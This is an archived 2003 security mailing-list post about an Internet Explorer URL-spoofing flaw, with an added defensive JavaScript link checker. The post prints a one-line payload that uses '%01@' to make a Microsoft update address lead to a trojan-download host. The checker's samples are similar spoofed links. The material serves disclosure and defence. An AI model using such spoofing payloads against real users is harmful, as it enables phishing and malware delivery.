Open Source and information security mailing list archives
 
Message-ID: <20031209182259.37248.qmail@web60809.mail.yahoo.com>
From: sgmasood at yahoo.com (S G Masood)
Subject: RE: FWD: Internet Explorer URL parsing vulnerability

LOL. This is so simple and dangerous, it almost made
me laugh and cry at the same time. Most of you will
realise why...;D 
The Paypal, AOL, Visa, Mastercard, et al email
scammers will have a harvest of gold this month with
lots of zombies falling for this simple technique.

># POC ##########
>http://www.zapthedingbat.com/security/ex01/vun1.htm

Don't be surprised if your latest download from
http://www.microsoft.com turns out to be a trojan!

location.href=unescape('http://windowsupdate.microsoft.com%01@...edownloadaneviltrojanfromme.com');


--
S.G.Masood

Hyderabad,
India

PS: One more thing - no scripting required to exploit this.
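
A defensive check for the trick described in this message, as an added example that is not part of the original post: it parses a link with the standard URL parser and flags a userinfo part (the text before `@`) that carries a control character such as `%01` or that looks like a hostname other than the real one. The function name `inspectLink` and the `evil.example` host are assumptions made for the illustration, and the sample links are constructed.

```javascript
// Added example: flag links whose userinfo part imitates a trusted host.
// Sample URLs are constructed; evil.example is a placeholder host.
const CONTROL = /[\u0000-\u001f\u007f]/;
const HOSTLIKE = /^[a-z0-9-]+(\.[a-z0-9-]+)+$/i;

// Percent-decode without throwing on malformed escapes.
function safeDecode(s) {
  try { return decodeURIComponent(s); } catch { return s; }
}

function inspectLink(raw) {
  let url;
  try { url = new URL(raw); } catch { return { host: null, shown: '', findings: ['unparseable'] }; }

  const findings = [];
  const user = safeDecode(url.username);
  const pass = safeDecode(url.password);
  // Text a truncating address bar would stop at: everything before the first control character.
  const shown = user.split(CONTROL)[0];

  if (user || pass) {
    findings.push('userinfo-present');
    if (CONTROL.test(user + pass)) findings.push('control-char-in-userinfo');
    // A userinfo that reads like a domain name but is not the real host is a spoofing signal.
    if (HOSTLIKE.test(shown) && shown.toLowerCase() !== url.hostname) {
      findings.push('userinfo-imitates-host');
    }
  }
  return { host: url.hostname, shown, findings };
}

// Constructed samples: the pattern from the message, a plain link, and a benign userinfo.
const samples = [
  'http://windowsupdate.microsoft.com%01@evil.example/update.exe',
  'http://www.paypal.com@evil.example/login',
  'https://www.microsoft.com/download',
  'http://alice@intranet.example/',
];
for (const s of samples) {
  const r = inspectLink(s);
  console.log(`${s}\n  real host: ${r.host}  findings: ${r.findings.join(', ') || 'none'}`);
}
```

A mail or proxy filter can treat `control-char-in-userinfo` as a block condition and `userinfo-imitates-host` as a strong phishing signal, since legitimate links rarely carry a domain name before the `@`.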


